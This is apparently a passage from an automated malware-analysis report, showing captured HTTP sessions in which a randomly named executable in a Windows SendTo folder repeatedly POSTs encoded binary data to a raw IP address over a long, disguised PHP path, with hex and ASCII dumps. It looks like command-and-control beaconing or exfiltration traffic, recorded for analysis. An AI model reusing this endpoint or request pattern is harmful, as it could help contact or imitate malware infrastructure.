                                          Sep 13, 2024 21:03:04.807431936 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:05.556852102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:05.685635090 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          35 | 192.168.2.4 | 56704 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:05.822371006 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:06.556216955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:06.684621096 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          36 | 192.168.2.4 | 56705 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:05.851211071 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:06.586021900 CEST | 25 | IN | HTTP/1.1 100 Continue


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          37 | 192.168.2.4 | 56706 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:06.898370028 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:07.680075884 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:07.854856968 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          38 | 192.168.2.4 | 56707 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:07.984697104 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:08.750447035 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:08.884655952 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          39 | 192.168.2.4 | 56708 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:09.016480923 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:09.766700983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:09.924606085 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          40 | 192.168.2.4 | 56709 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:10.087774038 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:10.847594976 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:11.000494957 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          41 | 192.168.2.4 | 56710 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:11.133155107 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:11.488446951 CEST2528OUTData Raw: 5e 56 46 52 55 4a 59 51 59 5f 51 51 52 59 54 55 5a 5f 5a 5d 55 51 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFRUJYQY_QQRYTUZ_Z]UQSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(5!2:70"*+.V<-_=;7(&'34P1*<%/819[&!^-;


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          42 | 192.168.2.4 | 56711 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:11.698117018 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2092
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:12.052371025 CEST2092OUTData Raw: 5b 50 43 51 55 4b 59 53 59 5f 51 51 52 59 54 57 5a 58 5a 5b 55 51 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCQUKYSY_QQRYTWZXZ[UQSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?6\7T%_"#Z>;&S<?"*<(,9$ &*4&Y4^&9[&!^-3
                                          Sep 13, 2024 21:03:12.437541008 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:12.568710089 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 56 2b 40 23 56 25 2b 30 0a 2f 13 0f 0e 24 11 3c 11 2b 33 35 42 3c 3e 27 02 2d 14 0c 10 24 15 3e 03 27 05 2b 10 27 11 33 50 2a 2a 2e 46 0d 1d 26 01 3e 2f 0e 10 3e 07 3c 58 24 2e 22 06 20 56 2b 5a 24 3f 3b 54 37 3c 0f 05 34 0c 30 0e 26 39 3d 5d 2d 35 03 02 29 08 26 58 23 36 2e 55 0f 15 39 14 26 0f 29 0c 3c 32 0e 03 29 59 22 57 25 2f 2f 1e 31 05 06 51 30 38 3e 52 26 59 35 58 25 31 3b 5c 28 13 0f 1d 22 57 26 14 23 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989V+@#V%+0/$<+35B<>'-$>'+'3P**.F&>/><X$." V+Z$?;T7<40&9=]-5)&X#6.U9&)<2)Y"W%//1Q08>R&Y5X%1;\("W&#+'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          43 | 192.168.2.4 | 56712 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:11.819670916 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:12.179837942 CEST2532OUTData Raw: 5e 54 46 51 50 47 59 50 59 5f 51 51 52 5d 54 53 5a 5b 5a 5d 55 5f 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFQPGYPY_QQR]TSZ[Z]U_SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+&X 673=(*W<"+;4V<<&%0(24229[&!^-3
                                          Sep 13, 2024 21:03:12.580866098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:12.749082088 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          44 | 192.168.2.4 | 56713 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:12.918162107 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2520
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:13.269975901 CEST2520OUTData Raw: 5b 54 46 51 50 46 59 54 59 5f 51 51 52 59 54 53 5a 52 5a 5f 55 50 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFQPFYTY_QQRYTSZRZ_UPSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C(/71!\#:*(.T+)??<0#$97A2?+29[&!^-
                                          Sep 13, 2024 21:03:13.649657965 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:13.776314020 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          45 | 192.168.2.4 | 56714 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:13.923214912 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:14.270070076 CEST2532OUTData Raw: 5b 52 43 52 55 4b 59 5d 59 5f 51 51 52 5b 54 54 5a 5b 5a 5b 55 53 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCRUKY]Y_QQR[TTZ[Z[USSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<<:[!1%^40)Z)(,)Y*+6% ,29$2+';9[&!^-+
                                          Sep 13, 2024 21:03:14.669158936 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:14.821662903 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          46 | 192.168.2.4 | 56715 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:15.256256104 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:15.613992929 CEST2532OUTData Raw: 5e 51 46 54 55 46 5c 52 59 5f 51 51 52 5e 54 57 5a 5a 5a 5f 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QFTUF\RY_QQR^TWZZZ_URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B*/57%" =>;.(<%=;<,&\'U?242?7';9[&!^-
                                          Sep 13, 2024 21:03:15.999147892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:16.152424097 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          47 | 192.168.2.4 | 56716 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:16.296906948 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:16.645234108 CEST2532OUTData Raw: 5e 56 43 5f 55 40 5c 57 59 5f 51 51 52 51 54 52 5a 5e 5a 5e 55 51 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VC_U@\WY_QQRQTRZ^Z^UQSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@*/#7!(+*<+(8Q+?*\3#2#% Y1;9[&!^-
                                          Sep 13, 2024 21:03:17.098423958 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:17.257046938 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          48 | 192.168.2.4 | 56717 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:17.425843000 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          49 | 192.168.2.4 | 56718 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:17.628149986 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
